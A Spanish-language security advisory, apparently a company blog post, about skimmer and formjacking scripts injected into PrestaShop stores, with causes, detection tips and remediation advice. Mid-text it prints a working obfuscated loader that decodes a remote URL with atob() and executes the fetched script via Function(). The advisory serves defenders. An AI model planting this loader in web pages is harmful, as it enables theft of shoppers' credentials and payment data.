Notepad++ sufre un ataque a su sistema de actualizaciones
03/02/2026
Explotación de parámetros en módulos de navegación por facetas de PrestaShop: un problema silencioso de rendimiento
21/02/2026Alerta de seguridad: skimmers incrustados en tiendas PrestaShop — ¿está tu e-commerce comprometido?
En las últimas semanas, la comunidad de propietarios de tiendas PrestaShop ha levantado la voz ante una creciente oleada de incidentes de skimming y scripts maliciosos incrustados que comprometen la seguridad de tiendas online y la información de sus clientes. Aunque PrestaShop no ha facilitado detalles técnicos completos sobre el mecanismo exacto de estas intrusiones, todo apunta a vulnerabilidades explotadas en instalaciones de PrestaShop desactualizadas, módulos inseguros o credenciales comprometidas como las causas más probables de estos ataques.
Desde PrestaShop se ha lanzado un comunicado general donde explican la forma de identificar si tu tienda está vulnerada.
🕵️♂️ ¿Qué está ocurriendo realmente?
Expertos en ciberseguridad han documentado casos de scripts de ‘skimmer’ incrustados en código JavaScript de sitios PrestaShop, que pueden interceptar datos sensibles, incluyendo credenciales y, en algunos casos, información de pago al visitar el proceso de compra o formularios de inicio de sesión. Estos scripts suelen estar ofuscados y ocultos dentro de plantillas, ficheros JavaScript o incluso en la base de datos de la tienda, lo que los hace difíciles de detectar sin un análisis profundo.
Otro patrón observado es el uso de JavaScript de ‘formjacking’ que captura los valores de correo electrónico y contraseña de los formularios de acceso para enviarlos a dominios controlados por atacantes.
Aunque PrestaShop ha recomendado a los desarrolladores verificar sus tiendas, no ha publicado un informe técnico detallado de cómo se consigue esta inserción de código malicioso ni qué vectores concretos se están explotando (por ejemplo, a través de un CVE específico).
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>Una forma habitual de identificar este tipo de compromiso consiste en revisar los ficheros de la plantilla activa, especialmente aquellos que se cargan en todas las páginas, como _partials/head.tpl. En los casos analizados, el skimmer no se instala como un módulo visible, sino que se inyecta directamente mediante una etiqueta <script>, lo que implica que un atacante ha logrado modificar archivos de la tienda. El patrón más característico es la presencia de código ofuscado que utiliza la función atob() para decodificar una URL remota, normalmente cargada mediante XMLHttpRequest. Aunque la cadena codificada cambia entre infecciones, la estructura del script suele repetirse, lo que permite detectarlo buscando llamadas sospechosas a atob(), Function() o peticiones externas no reconocidas. La aparición de este tipo de código en plantillas, JavaScript o base de datos es un indicador claro de vulneración y debe tratarse como un incidente de seguridad.
⚠️ Causas más probables de la explotación
Las investigaciones y alertas de la comunidad indican que las brechas suelen estar relacionadas con:
- 🧩 Core o módulos de PrestaShop desactualizados, que no cuentan con los parches de seguridad más recientes.
- 🧪 Módulos de terceros con vulnerabilidades conocidas, como inyecciones SQL o ejecución remota de código (RCE).
- 🔑 Fuga o uso de credenciales comprometidas (por fuerza bruta, phishing u otros métodos), facilitando el acceso no autorizado al panel o al servidor.
- 💻 Scripts o integraciones personalizadas mal securizadas que permiten inyección o ejecución de código.
🧠 Consecuencias para las tiendas comprometidas
Cuando una tienda es infectada con un skimmer o código malicioso, los riesgos incluyen:
- Robo de credenciales de clientes o administradores.
- Compromiso de datos sensibles, que puede derivar en fraude o pérdida de confianza de clientes.
- Posible inclusión de la tienda en listas negras o sanciones de cumplimiento de normas de pago (PCI).
- Daños reputacionales y económicos.
🧰 Recomendaciones de seguridad — Qué debes hacer ahora
Si al auditar tu tienda encuentras indicios de infección o alguna anomalía en tu flujo de pedidos, credenciales o código:
- 🔄 Actualiza PrestaShop a la última versión disponible inmediatamente.
- ⬆️ Mantén todos los módulos actualizados y elimina aquellos que no utilices.
- 🔑 Modifica todas las credenciales de acceso (usuarios, FTP/SFTP, SSH, bases de datos, panel de administración, etc.).
- 📡 Restringe el acceso al panel de administración, SSH o FTP a IPs conocidas o mediante una VPN.
- 🛡️ Realiza una auditoría de seguridad profesional para identificar vectores de entrada y posibles puertas traseras.
En DEINSER podemos cotizar y ejecutar auditorías de seguridad completas adaptadas a tu tienda y entorno tecnológico.
🔚 Conclusión
La amenaza de skimmers y código malicioso incrustado en tiendas PrestaShop es real y está afectando a proyectos que no han aplicado prácticas estrictas de mantenimiento y seguridad. La actualización constante, la gestión cuidadosa de módulos y la protección de credenciales son medidas fundamentales para evitar comprometer tu tienda y los datos de tus clientes. En DEINSER estamos listos para ayudarte con auditorías, planes de mitigación y servicios de protección continuada para tu negocio online.
